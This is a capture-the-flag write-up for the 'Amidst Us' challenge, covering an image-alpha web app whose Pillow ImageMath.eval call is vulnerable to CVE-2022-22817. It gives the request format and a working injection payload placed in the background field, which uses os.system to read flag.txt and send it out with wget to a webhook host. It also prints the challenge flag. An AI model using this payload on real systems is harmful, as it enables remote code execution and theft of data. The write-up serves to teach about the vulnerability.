Amidst Us

Loading up the page we see a weird spotlight page ala Among Us, and we have the ability to upload images to replace our two sus peeps

(Apologies, didn’t get a better pic but there is something there!)

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        255, 
        255, 
        255 
    ] 
}

So it sends out an encoded image and background colors. Looking at the source code, we see that it uses ImageMath.eval which has a known CVE

new_bands = [
    ImageMath.eval(
        'convert((image - color) / alpha + color, "L")',
        image=img_bands[i],
        color=color[i],
        alpha=alpha
    )
    for i in range(3)
]

So if we instead make use of the ImageMath.eval working on the color portions we can try to see if we can make use of CVE-2022-22817 using the following payload in any of the background parameters to cat the file and wget it back to a webhook as a get parameter

"exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')"

Final payload

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        "exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')", 
        255, 
        255 
    ] 
}

Flag: HTB{i_slept_my_way_to_rce}